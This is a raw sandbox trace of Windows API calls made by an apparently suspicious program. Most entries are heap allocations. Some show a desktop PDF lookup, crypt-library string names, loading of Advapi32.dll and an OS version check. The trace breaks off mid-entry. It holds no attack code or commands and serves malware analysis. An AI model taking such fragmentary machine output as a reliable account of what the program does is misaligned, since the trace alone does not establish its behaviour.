RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0153.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0153.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0153.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0153.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0153.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0153.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0153.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0153.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0153.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0153.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0153.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0153.441] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0153.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0153.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0153.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0153.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0153.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0153.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0153.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0153.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0153.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0153.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0153.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0153.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0153.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0153.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0153.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0153.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0153.442] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0153.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0153.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0153.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0153.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0153.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0153.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0153.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0153.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0153.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0153.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0153.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0153.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0153.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0153.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0153.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0153.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0153.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0153.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0153.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0153.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0153.443] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/GUlu8dq_.pdf", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd113baf0, ftCreationTime.dwHighDateTime=0x1d5e477, ftLastAccessTime.dwLowDateTime=0xee5cf880, ftLastAccessTime.dwHighDateTime=0x1d5ed4e, ftLastWriteTime.dwLowDateTime=0xee5cf880, ftLastWriteTime.dwHighDateTime=0x1d5ed4e, nFileSizeHigh=0x0, nFileSizeLow=0x14106, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="GUlu8dq_.pdf", cAlternateFileName="")) returned 0xa87110 [0153.444] FindClose (in: hFindFile=0xa87110 | out: hFindFile=0xa87110) returned 1 [0153.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0153.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0153.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0153.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0153.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0153.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0153.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0153.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0153.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0153.444] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0153.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0153.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0153.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0153.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0153.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0153.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0153.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0153.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0153.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0153.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0153.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0153.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0153.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0153.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0153.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0153.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0153.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0153.445] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0153.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0153.445] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0153.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0153.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0153.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0153.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0153.445] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0153.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0153.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0153.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0153.445] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0153.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0153.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0153.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0153.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0153.446] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0153.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0153.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0153.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0153.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0153.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0153.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0153.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0153.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0153.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0153.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0153.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0153.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0153.446] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0153.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0153.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0153.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0153.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0153.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0153.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0153.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0153.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0153.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0153.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0153.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0153.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0153.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0153.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0153.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0153.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0153.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0153.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0153.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0153.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0153.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0153.447] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0153.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0153.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0153.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0153.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0153.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0153.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0153.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0153.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0153.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0153.447] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0153.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0153.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0153.447] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0153.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0153.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0153.447] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0153.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0153.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0153.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0153.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0153.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0153.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0153.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0153.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0153.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0153.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0153.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0153.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0153.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0153.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0153.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0153.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0153.448] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0153.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0153.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0153.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0153.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0153.448] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0153.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0153.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0153.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0153.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0153.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0153.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0153.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0153.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0153.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0153.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0153.448] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0153.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0153.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0153.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0153.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0153.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0153.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0153.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0153.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0153.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0153.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0153.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0153.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0153.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0153.449] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0153.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0153.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0153.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0153.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0153.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0153.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0153.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0153.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0153.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0153.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0153.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0153.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0153.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0153.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0153.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0153.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0153.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0153.450] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0153.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0153.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0153.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0153.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0153.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0153.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0153.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0153.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0153.450] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0153.450] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0153.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0153.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0153.450] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0153.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0153.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0153.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0153.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0153.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0153.450] HeapFree 